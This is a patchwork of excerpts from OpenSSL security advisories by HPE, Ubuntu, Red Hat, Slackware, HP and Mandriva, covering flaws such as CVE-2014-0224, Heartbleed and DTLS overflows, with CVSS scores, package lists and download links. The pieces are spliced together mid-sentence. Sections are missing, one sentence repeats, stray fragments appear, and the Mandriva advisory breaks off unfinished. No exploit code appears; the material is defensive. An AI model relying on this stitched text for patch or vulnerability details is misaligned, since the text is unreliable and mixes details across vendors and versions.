(AV:N/AC:M/Au:N/C:N/I:N/A:P)\n\n CVE-2014-3566\n 3.1 CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N\n 4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)\n\n CVE-2016-0705\n 9.8 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)\n\n Information on CVSS is documented in\n HPE Customer Notice HPSN-2008-002 here:\n\nhttps://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499\n\nRESOLUTION\n\nHPE recommends applying the following software updates to resolve the\nvulnerabilities in the impacted versions of HPE StoreVirtual products running\nHPE LeftHand OS. \n\nLeftHand OS v11.5 - Patches 45019-00 and 45020 \nLeftHand OS v12.0 - Patches 50016-00 and 50017-00 \nLeftHand OS v12.5 - Patch 55016-00 \nLeftHand OS v12.6 - Patch 56002-00 \n\n**Notes:**\n\nThese patches enable TLSv1.2 protocol and upgrades the OpenSSL RPM revision\nto OpenSSL v1.0.1e 48. \nThese patches migrate Certificate Authority Hashing Algorithm from a weak\nhashing algorithm SHA1 to the stronger hashing algorithm SHA256. ============================================================================\nUbuntu Security Notice USN-2232-1\nJune 05, 2014\n\nopenssl vulnerabilities\n============================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 14.04 LTS\n- Ubuntu 13.10\n- Ubuntu 12.04 LTS\n- Ubuntu 10.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in OpenSSL. This issue only affected Ubuntu 12.04 LTS, Ubuntu 13.10, and\nUbuntu 14.04 LTS. This issue only\naffected Ubuntu 12.04 LTS, Ubuntu 13.10, and Ubuntu 14.04 LTS. \n(CVE-2014-3470)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 14.04 LTS:\n libssl1.0.0 1.0.1f-1ubuntu2.2\n\nUbuntu 13.10:\n libssl1.0.0 1.0.1e-3ubuntu1.4\n\nUbuntu 12.04 LTS:\n libssl1.0.0 1.0.1-4ubuntu5.14\n\nUbuntu 10.04 LTS:\n libssl0.9.8 0.9.8k-7ubuntu8.18\n\nAfter a standard system update you need to reboot your computer to make all\nthe necessary changes. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Important: openssl security update\nAdvisory ID: RHSA-2014:0679-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2014-0679.html\nIssue date: 2014-06-10\nCVE Names: CVE-2010-5298 CVE-2014-0195 CVE-2014-0198 \n CVE-2014-0221 CVE-2014-0224 CVE-2014-3470 \n=====================================================================\n\n1. Summary:\n\nUpdated openssl packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 7. \n\nThe Red Hat Security Response Team has rated this update as having\nImportant security impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64\nRed Hat Enterprise Linux Server (v. 7) - ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - ppc64, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - x86_64\n\n3. Description:\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3)\nand Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library. \n\nIt was found that OpenSSL clients and servers could be forced, via a\nspecially crafted handshake packet, to use weak keying material for\ncommunication. A man-in-the-middle attacker could use this flaw to decrypt\nand modify traffic between a client and a server. (CVE-2014-0224)\n\nNote: In order to exploit this flaw, both the server and the client must be\nusing a vulnerable version of OpenSSL; the server must be using OpenSSL\nversion 1.0.1 and above, and the client must be using any version of\nOpenSSL. For more information about this flaw, refer to:\nhttps://access.redhat.com/site/articles/904433\n\nA buffer overflow flaw was found in the way OpenSSL handled invalid DTLS\npacket fragments. A remote attacker could possibly use this flaw to execute\narbitrary code on a DTLS client or server. (CVE-2014-0195)\n\nMultiple flaws were found in the way OpenSSL handled read and write buffers\nwhen the SSL_MODE_RELEASE_BUFFERS mode was enabled. A TLS/SSL client or\nserver using OpenSSL could crash or unexpectedly drop connections when\nprocessing certain SSL traffic. (CVE-2010-5298, CVE-2014-0198)\n\nA denial of service flaw was found in the way OpenSSL handled certain DTLS\nServerHello requests. (CVE-2014-0221)\n\nA NULL pointer dereference flaw was found in the way OpenSSL performed\nanonymous Elliptic Curve Diffie Hellman (ECDH) key exchange. A specially\ncrafted handshake packet could cause a TLS/SSL client that has the\nanonymous ECDH cipher suite enabled to crash. (CVE-2014-3470)\n\nRed Hat would like to thank the OpenSSL project for reporting these issues. \nUpstream acknowledges KIKUCHI Masashi of Lepidum as the original reporter\nof CVE-2014-0224, J\u00fcri Aedla as the original reporter of CVE-2014-0195,\nImre Rad of Search-Lab as the original reporter of CVE-2014-0221, and Felix\nGr\u00f6bert and Ivan Fratri\u0107 of Google as the original reporters of\nCVE-2014-3470. \n\nAll OpenSSL users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. For the update to take\neffect, all services linked to the OpenSSL library (such as httpd and other\nSSL-enabled services) must be restarted or the system rebooted. \n\n4. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nThis update is available via the Red Hat Network. Details on how to\nuse the Red Hat Network to apply this update are available at\nhttps://access.redhat.com/site/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1087195 - CVE-2010-5298 openssl: freelist misuse causing a possible use-after-free\n1093837 - CVE-2014-0198 openssl: SSL_MODE_RELEASE_BUFFERS NULL pointer dereference in do_ssl3_write()\n1103586 - CVE-2014-0224 openssl: SSL/TLS MITM vulnerability\n1103593 - CVE-2014-0221 openssl: DoS when sending invalid DTLS handshake\n1103598 - CVE-2014-0195 openssl: Buffer overflow via DTLS invalid fragment\n1103600 - CVE-2014-3470 openssl: client-side denial of service when using anonymous ECDH\n\n6. Package List:\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\nopenssl-1.0.1e-34.el7_0.3.src.rpm\n\nx86_64:\nopenssl-1.0.1e-34.el7_0.3.x86_64.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.3.i686.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.3.x86_64.rpm\nopenssl-libs-1.0.1e-34.el7_0.3.i686.rpm\nopenssl-libs-1.0.1e-34.el7_0.3.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-34.el7_0.3.i686.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.3.x86_64.rpm\nopenssl-devel-1.0.1e-34.el7_0.3.i686.rpm\nopenssl-devel-1.0.1e-34.el7_0.3.x86_64.rpm\nopenssl-perl-1.0.1e-34.el7_0.3.x86_64.rpm\nopenssl-static-1.0.1e-34.el7_0.3.i686.rpm\nopenssl-static-1.0.1e-34.el7_0.3.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\nopenssl-1.0.1e-34.el7_0.3.src.rpm\n\nx86_64:\nopenssl-1.0.1e-34.el7_0.3.x86_64.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.3.i686.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.3.x86_64.rpm\nopenssl-libs-1.0.1e-34.el7_0.3.i686.rpm\nopenssl-libs-1.0.1e-34.el7_0.3.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-34.el7_0.3.i686.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.3.x86_64.rpm\nopenssl-devel-1.0.1e-34.el7_0.3.i686.rpm\nopenssl-devel-1.0.1e-34.el7_0.3.x86_64.rpm\nopenssl-perl-1.0.1e-34.el7_0.3.x86_64.rpm\nopenssl-static-1.0.1e-34.el7_0.3.i686.rpm\nopenssl-static-1.0.1e-34.el7_0.3.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nopenssl-1.0.1e-34.el7_0.3.src.rpm\n\nppc64:\nopenssl-1.0.1e-34.el7_0.3.ppc64.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.3.ppc.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.3.ppc64.rpm\nopenssl-devel-1.0.1e-34.el7_0.3.ppc.rpm\nopenssl-devel-1.0.1e-34.el7_0.3.ppc64.rpm\nopenssl-libs-1.0.1e-34.el7_0.3.ppc.rpm\nopenssl-libs-1.0.1e-34.el7_0.3.ppc64.rpm\n\ns390x:\nopenssl-1.0.1e-34.el7_0.3.s390x.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.3.s390.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.3.s390x.rpm\nopenssl-devel-1.0.1e-34.el7_0.3.s390.rpm\nopenssl-devel-1.0.1e-34.el7_0.3.s390x.rpm\nopenssl-libs-1.0.1e-34.el7_0.3.s390.rpm\nopenssl-libs-1.0.1e-34.el7_0.3.s390x.rpm\n\nx86_64:\nopenssl-1.0.1e-34.el7_0.3.x86_64.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.3.i686.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.3.x86_64.rpm\nopenssl-devel-1.0.1e-34.el7_0.3.i686.rpm\nopenssl-devel-1.0.1e-34.el7_0.3.x86_64.rpm\nopenssl-libs-1.0.1e-34.el7_0.3.i686.rpm\nopenssl-libs-1.0.1e-34.el7_0.3.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\nppc64:\nopenssl-debuginfo-1.0.1e-34.el7_0.3.ppc.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.3.ppc64.rpm\nopenssl-perl-1.0.1e-34.el7_0.3.ppc64.rpm\nopenssl-static-1.0.1e-34.el7_0.3.ppc.rpm\nopenssl-static-1.0.1e-34.el7_0.3.ppc64.rpm\n\ns390x:\nopenssl-debuginfo-1.0.1e-34.el7_0.3.s390.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.3.s390x.rpm\nopenssl-perl-1.0.1e-34.el7_0.3.s390x.rpm\nopenssl-static-1.0.1e-34.el7_0.3.s390.rpm\nopenssl-static-1.0.1e-34.el7_0.3.s390x.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-34.el7_0.3.i686.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.3.x86_64.rpm\nopenssl-perl-1.0.1e-34.el7_0.3.x86_64.rpm\nopenssl-static-1.0.1e-34.el7_0.3.i686.rpm\nopenssl-static-1.0.1e-34.el7_0.3.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nopenssl-1.0.1e-34.el7_0.3.src.rpm\n\nx86_64:\nopenssl-1.0.1e-34.el7_0.3.x86_64.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.3.i686.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.3.x86_64.rpm\nopenssl-devel-1.0.1e-34.el7_0.3.i686.rpm\nopenssl-devel-1.0.1e-34.el7_0.3.x86_64.rpm\nopenssl-libs-1.0.1e-34.el7_0.3.i686.rpm\nopenssl-libs-1.0.1e-34.el7_0.3.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-34.el7_0.3.i686.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.3.x86_64.rpm\nopenssl-perl-1.0.1e-34.el7_0.3.x86_64.rpm\nopenssl-static-1.0.1e-34.el7_0.3.i686.rpm\nopenssl-static-1.0.1e-34.el7_0.3.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/#package\n\n7. References:\n\nhttps://www.redhat.com/security/data/cve/CVE-2010-5298.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0195.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0198.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0221.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0224.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-3470.html\nhttps://access.redhat.com/security/updates/classification/#important\nhttps://access.redhat.com/site/articles/904433\nhttps://access.redhat.com/site/solutions/905793\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2014 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.4 (GNU/Linux)\n\niD8DBQFTl161XlSAg2UNWIIRAiJlAKCiztPWPTBaVbDSJK/cEtvknFYpTACgur3t\nGHJznx5GNeKZ00848jTZ9hw=\n=48eV\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce. Description:\n\nRed Hat JBoss Web Server is a fully integrated and certified set of\ncomponents for hosting Java web applications. It is comprised of the Apache\nHTTP Server, the Apache Tomcat Servlet container, Apache Tomcat Connector\n(mod_jk), JBoss HTTP Connector (mod_cluster), Hibernate, and the Tomcat\nNative library. \n\nThis release serves as a replacement for Red Hat JBoss Web Server 2.0.1,\nand includes several bug fixes. Refer to the Red Hat JBoss Web Server 2.1.0\nRelease Notes, linked to in the References section, for information on the\nmost significant of these changes. \n\nThe following security issues are also fixed with this release:\n\nA race condition flaw, leading to heap-based buffer overflows, was found in\nthe mod_status httpd module. A remote attacker able to access a status page\nserved by mod_status on a server using a threaded Multi-Processing Module\n(MPM) could send a specially crafted request that would cause the httpd\nchild process to crash or, possibly, allow the attacker to execute\narbitrary code with the privileges of the \"apache\" user. \nA remote attacker could submit a specially crafted request that would cause\nthe httpd child process to hang indefinitely. (CVE-2014-0231)\n\nIt was found that several application-provided XML files, such as web.xml,\ncontent.xml, *.tld, *.tagx, and *.jspx, resolved external entities,\npermitting XML External Entity (XXE) attacks. An attacker able to deploy\nmalicious applications to Tomcat could use this flaw to circumvent security\nrestrictions set by the JSM, and gain access to sensitive information on\nthe system. Note that this flaw only affected deployments in which Tomcat\nis running applications from untrusted sources, such as in a shared hosting\nenvironment. (CVE-2013-4590)\n\nIt was found that, in certain circumstances, it was possible for a\nmalicious web application to replace the XML parsers used by Tomcat to\nprocess XSLTs for the default servlet, JSP documents, tag library\ndescriptors (TLDs), and tag plug-in configuration files. The injected XML\nparser(s) could then bypass the limits imposed on XML external entities\nand/or gain access to the XML files processed for other web applications\ndeployed on the same Tomcat instance. Solution:\n\nThe References section of this erratum contains a download link (you must\nlog in to download the update). 5 client) - i386, x86_64\n\n3. \n\nIt was discovered that the OBJ_obj2txt() function could fail to properly\nNUL-terminate its output. This could possibly cause an application using\nOpenSSL functions to format fields of X.509 certificates to disclose\nportions of its memory. \n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n+--------------------------+\npatches/packages/openssl-1.0.1h-i486-1_slack14.1.txz: Upgraded. \n+--------------------------+\n\n\nWhere to find the new packages:\n+-----------------------------+\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you. \n\nUpdated packages for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/openssl-0.9.8za-i486-1_slack13.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/openssl-solibs-0.9.8za-i486-1_slack13.0.txz\n\nUpdated packages for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/openssl-0.9.8za-x86_64-1_slack13.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/openssl-solibs-0.9.8za-x86_64-1_slack13.0.txz\n\nUpdated packages for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/openssl-0.9.8za-i486-1_slack13.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/openssl-solibs-0.9.8za-i486-1_slack13.1.txz\n\nUpdated packages for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/openssl-0.9.8za-x86_64-1_slack13.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/openssl-solibs-0.9.8za-x86_64-1_slack13.1.txz\n\nUpdated packages for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/openssl-0.9.8za-i486-1_slack13.37.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/openssl-solibs-0.9.8za-i486-1_slack13.37.txz\n\nUpdated packages for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/openssl-0.9.8za-x86_64-1_slack13.37.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/openssl-solibs-0.9.8za-x86_64-1_slack13.37.txz\n\nUpdated packages for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-1.0.1h-i486-1_slack14.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-solibs-1.0.1h-i486-1_slack14.0.txz\n\nUpdated packages for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-1.0.1h-x86_64-1_slack14.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-solibs-1.0.1h-x86_64-1_slack14.0.txz\n\nUpdated packages for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-1.0.1h-i486-1_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-solibs-1.0.1h-i486-1_slack14.1.txz\n\nUpdated packages for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-1.0.1h-x86_64-1_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-solibs-1.0.1h-x86_64-1_slack14.1.txz\n\nUpdated packages for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/openssl-solibs-1.0.1h-i486-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/openssl-1.0.1h-i486-1.txz\n\nUpdated packages for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/openssl-solibs-1.0.1h-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/openssl-1.0.1h-x86_64-1.txz\n\n\nMD5 signatures:\n+-------------+\n\nSlackware 13.0 packages:\n634b8ecc8abc6d3f249b73d0fefa5959 openssl-0.9.8za-i486-1_slack13.0.txz\na2529f1243d42a3608f61b96236b5f60 openssl-solibs-0.9.8za-i486-1_slack13.0.txz\n\nSlackware x86_64 13.0 packages:\n2ddac651c5f2531f3a7f70d9f5823bd6 openssl-0.9.8za-x86_64-1_slack13.0.txz\nd7ffeb15713a587f642fbb3d5c310c75 openssl-solibs-0.9.8za-x86_64-1_slack13.0.txz\n\nSlackware 13.1 packages:\n0b84a6a1edf76cba83d4c52c54196baa openssl-0.9.8za-i486-1_slack13.1.txz\ndfd5d241b0e1703ae9d70d6ccda06179 openssl-solibs-0.9.8za-i486-1_slack13.1.txz\n\nSlackware x86_64 13.1 packages:\nbd749622577a5f76a59d90b95aa922fd openssl-0.9.8za-x86_64-1_slack13.1.txz\n35cf911dd9f0cc13f7f0056d9e1f4520 openssl-solibs-0.9.8za-x86_64-1_slack13.1.txz\n\nSlackware 13.37 packages:\n8f674defac9002c81265d284b1072f75 openssl-0.9.8za-i486-1_slack13.37.txz\n48ce79e7714cb0c823d2b6ea4a88ba51 openssl-solibs-0.9.8za-i486-1_slack13.37.txz\n\nSlackware x86_64 13.37 packages:\nefa09162c22782c15806bca99472c5be openssl-0.9.8za-x86_64-1_slack13.37.txz\n8e3b8d1e3d3a740bd274fbe38dc10f96 openssl-solibs-0.9.8za-x86_64-1_slack13.37.txz\n\nSlackware 14.0 packages:\n8e2698d19f54c7e0cac8f998df23b782 openssl-1.0.1h-i486-1_slack14.0.txz\ncf6233bc169cf6dd192bb7210f779fc1 openssl-solibs-1.0.1h-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 packages:\n2b4f0610d5e46fa7bb27a0b39f0d6d33 openssl-1.0.1h-x86_64-1_slack14.0.txz\n18fdd83dcf86204275508a689a017dea openssl-solibs-1.0.1h-x86_64-1_slack14.0.txz\n\nSlackware 14.1 packages:\n49aea7da42eef41da894f29762971863 openssl-1.0.1h-i486-1_slack14.1.txz\n6f19f4fdc3f018b4e821c519d7bb1e5c openssl-solibs-1.0.1h-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 packages:\nccf5ff2b107c665a4f3bf98176937749 openssl-1.0.1h-x86_64-1_slack14.1.txz\nea1aaba38c98b096186ca94ca541a793 openssl-solibs-1.0.1h-x86_64-1_slack14.1.txz\n\nSlackware -current packages:\ndb1ed7ded71ab503f567940fff39eb16 a/openssl-solibs-1.0.1h-i486-1.txz\n0db4f91f9b568b2b2629950e5ab88b22 n/openssl-1.0.1h-i486-1.txz\n\nSlackware x86_64 -current packages:\nd01aef33335bee27f36574241f54091f a/openssl-solibs-1.0.1h-x86_64-1.txz\n95a743d21c58f39573845d6ec5270656 n/openssl-1.0.1h-x86_64-1.txz\n\n\nInstallation instructions:\n+------------------------+\n\nUpgrade the packages as root:\n# upgradepkg openssl-1.0.1h-i486-1_slack14.1.txz openssl-solibs-1.0.1h-i486-1_slack14.1.txz\n\n\n+-----+\n\nSlackware Linux Security Team\nhttp://slackware.com/gpg-key\nsecurity@slackware.com\n\n+------------------------------------------------------------------------+\n| To leave the slackware-security mailing list: |\n+------------------------------------------------------------------------+\n| Send an email to majordomo@slackware.com with this text in the body of |\n| the email message: |\n| |\n| unsubscribe slackware-security |\n| |\n| You will get a confirmation message back containing instructions to |\n| complete the process. Please do not reply to this email address. \n\nHP Systems Insight Manager v7.3 Hotfix kit\nHP Systems Insight Manager v7.2 Hotfix kit (The HP Systems Insight Manager\nv7.2 Hotfix kit is currently unavailable, but will be released at a later\ndate. \n\nhttp://h18013.www1.hp.com/products/servers/management/hpsim/download.html\n\nNOTE: No reboot of the system is required after applying the HP SIM Hotfix\nkit. \nHP System Management Homepage versions 7.3.2 and earlier for Linux and\nWindows. HP System Management Homepage v7.2.4.1 is available for\nWindows 2003 only. \n\nHP System Management Homepage v7.2.4.1 for Windows x86:\nhttp://www.hp.com/swpublishing/MTX-d775367b0a28449ca05660778b\nftp://ftp.hp.com/pub/softlib2/software1/sc-windows/p11160892/v98702\n\nHP System Management Homepage v7.2.4.1 for Windows x64:\nhttp://www.hp.com/swpublishing/MTX-3a7aa5e233904ebe847a5e1555\nftp://ftp.hp.com/pub/softlib2/software1/sc-windows/p221526337/v98704\n\nHP System Management Homepage v7.3.3.1 for Windows x86:\nhttp://www.hp.com/swpublishing/MTX-3395d737d98f42149125b9bb05\nftp://ftp.hp.com/pub/softlib2/software1/sc-windows/p11160892/v98696\n\nHP System Management Homepage v7.3.3.1 for Windows x64:\nhttp://www.hp.com/swpublishing/MTX-e8076c2a35804685ad65b2b1ba\nftp://ftp.hp.com/pub/softlib2/software1/sc-windows/p221526337/v98698\n\nHP System Management Homepage v7.3.3.1 for Linux x86:\nhttp://www.hp.com/swpublishing/MTX-511c3e0b2f6f4f6bbc796fc619\nftp://ftp.hp.com/pub/softlib2/software1/pubsw-linux/p1980463820/v98694\n\nHP System Management Homepage v7.3.3.1 for Linux x64:\nhttp://www.hp.com/swpublishing/MTX-bd9a1cf60e344c549c4888db93\nftp://ftp.hp.com/pub/softlib2/software1/pubsw-linux/p1507410135/v98693\n\nNOTE: HP System Management Homepage v7.3.3.1 for Linux x86 still contains\nOpenSSL v1.0.0d. As long as all other products which SMH V7.3.3.1 for Linux\nx86 communicates with have been upgraded to the latest versions, it will not\nbe vulnerable to the exploits described in CVE-2014-0224. \n\nRelease Date: 2014-07-09\nLast Updated: 2014-07-09\n\nPotential Security Impact: Remote denial of service (DoS), code execution,\nunauthorized access, disclosure of information\n\nSource: Hewlett-Packard Company, HP Software Security Response Team\n\nVULNERABILITY SUMMARY\nPotential security vulnerabilities have been identified with HP Software\nOperation Orchestration. The vulnerabilities could be exploited to allow\nremote code execution, denial of service (DoS) and disclosure of information. \nOpenSSL is a 3rd party product that is embedded with some HP Software\nproducts. This bulletin notifies HP Software customers about products\naffected by the OpenSSL vulnerabilities\n\nReferences:\n\nCVE-2014-0195 Remote Unauthorized Access\nCVE-2014-0221 Remote Unauthorized Access or Disclosure of Information\nCVE-2014-3470 Remote Code Execution or Unauthorized Access\nSSRT101635\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \nHP Software Operation Orchestration, v9.X\n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n Reference Base Vector Base Score\nCVE-2014-0195 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8\nCVE-2014-0221 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8\nCVE-2014-3470 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3\n===========================================================\n Information on CVSS is documented\n in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\n\nHP has provided the following guideline for HP Operations Orchestration to\nresolve these vulnerabilities. \n\nGuidelines and Patches can be downloaded from HP Software Support Online:\nhttp://support.openview.hp.com/selfsolve/document/LID/OO_00030\n\nBulletin Applicability: This security bulletin applies to each OpenSSL\ncomponent that is embedded within the HP products listed in the security\nbulletin. The bulletin does not apply to any other 3rd party application\n(e.g. operating system, web server, or application server) that may be\nrequired to be installed by the customer according instructions in the\nproduct install guide. \n\nHISTORY\nVersion:1 (rev.1) - 9 July 2014 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running HP software products should be applied in\naccordance with the customer\u0027s patch management policy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HP Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com. \n\nReport: To report a potential security vulnerability with any HP supported\nproduct, send Email to: security-alert@hp.com\n\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\nalerts via Email:\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HP General Software\nHF = HP Hardware and Firmware\nMP = MPE/iX\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPI = Printing and Imaging\nPV = ProCurve\nST = Storage Software\nTU = Tru64 UNIX\nUX = HP-UX\n\nCopyright 2014 Hewlett-Packard Development Company, L.P. \nHewlett-Packard Company shall not be liable for technical or editorial errors\nor omissions contained herein. The information provided is provided \"as is\"\nwithout warranty of any kind. To the extent permitted by law, neither HP or\nits affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. \nHewlett-Packard Company and the names of Hewlett-Packard products referenced\nherein are trademarks of Hewlett-Packard Company in the United States and\nother countries. Other product and company names mentioned herein may be\ntrademarks of their respective owners. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n _______________________________________________________________________\n\n Mandriva Linux Security Advisory MDVSA-2015:062\n http://www.mandriva.com/en/support/security/\n _______________________________________________________________________\n\n Package : openssl\n Date : March 27, 2015\n Affected: Business Server 2.0\n _______________________________________________________________________\n\n Problem Description:\n\n Multiple vulnerabilities has been discovered and corrected in openssl:\n \n Race condition in the ssl3_read_bytes function in s3_pkt.c in OpenSSL\n through 1.0.1g, when SSL_MODE_RELEASE_BUFFERS is enabled, allows\n remote attackers to inject data across sessions or cause a denial of\n service (use-after-free and parsing error) via an SSL connection in\n a multithreaded environment (CVE-2010-5298). \n \n The Montgomery ladder implementation in OpenSSL through 1.0.0l does\n not ensure that certain swap operations have a constant-time behavior,\n which makes it easier for local users to obtain ECDSA nonces via a\n FLUSH+RELOAD cache side-channel attack (CVE-2014-0076). \n \n The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before\n 1.0.1g do not properly handle Heartbeat Extension packets, which allows\n remote attackers to obtain sensitive information from process memory\n via crafted packets that trigger a buffer over-read, as demonstrated\n by reading private keys, related to d1_both.c and t1_lib.c, aka the\n Heartbleed bug (CVE-2014-0160). \n \n OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before\n 1.0.1h does not properly restrict processing of ChangeCipherSpec\n messages, which allows man-in-the-middle attackers to trigger use of a\n zero-length master key in certain OpenSSL-to-OpenSSL communications,\n and consequently hijack sessions or obtain 